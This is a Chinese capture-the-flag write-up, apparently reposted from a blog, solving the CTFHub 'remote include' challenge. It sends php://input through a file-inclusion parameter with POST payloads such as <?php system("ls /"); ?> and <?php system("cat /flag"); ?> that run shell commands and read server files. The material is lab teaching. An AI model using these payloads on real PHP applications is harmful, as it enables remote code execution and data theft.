您的位置:首页 > 教育 > 培训 > CTFHUB-技能树-Web题-RCE(远程代码执行)-文件包含—远程包含

CTFHUB-技能树-Web题-RCE(远程代码执行)-文件包含—远程包含

2024/10/5 20:20:51 来源:https://blog.csdn.net/Static______/article/details/140033782  浏览:    关键词:CTFHUB-技能树-Web题-RCE(远程代码执行)-文件包含—远程包含

CTFHUB-技能树-Web题-RCE(远程代码执行)-文件包含—远程包含

首先查看代码

在这里插入图片描述

还记得strpos函数吗,这段代码意思就是判断输入是否有flag字段,

在这里插入图片描述

如果有就输出hacker

没有就进行include

PHPinfo当中也表明php://input可以用

在这里插入图片描述

那么,利用php://input来寻找flag

bp抓包,url中输入

payload:

?file=php://input

post传参

<?php system("ls"); ?> 查看当前目录

在这里插入图片描述

没有flag,查看上一级目录

<?php system("ls ../"); ?> 查看上一级目录

在这里插入图片描述

没有flag,继续,查看上一级目录

<?php system("ls ../../"); ?> 查看上上一级目录

在这里插入图片描述

还是没有,继续往上查看

<?php system("ls ../../../"); ?> 查看上上上一级目录

在这里插入图片描述

也可以直接查看根目录,

<?php system("ls /"); ?>

查看flag

<?php system("cat /flag"); ?>

在这里插入图片描述

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

推荐新闻

热搜词

CTFWeb篇02 不知真假如何的计算机专业毕业生就业形势 六九一二研发费用率垫底远弱同行,毛利率持续下滑今年或创新低 基于django+vue基于微信平台的家具商城售卖小程序的设计【开题报告+程序+论文】计算机毕设 如何成功交付ERP? web课程设计网页规划与设计 :旅游景点网站设计——西安(20页) HTML+CSS+JavaScript 学生DW网页设计作业成品 web课程设计网页规划与设计 HTML静态网页作业

声明:本站所有新闻及新闻图片来源于其他网站,如有侵权,请及时联系我们!

客户服务 | 关于我们 | 版权声明

版权所有:

Copyright 2024 尧图网 All Rights Reserved.QQ:809451989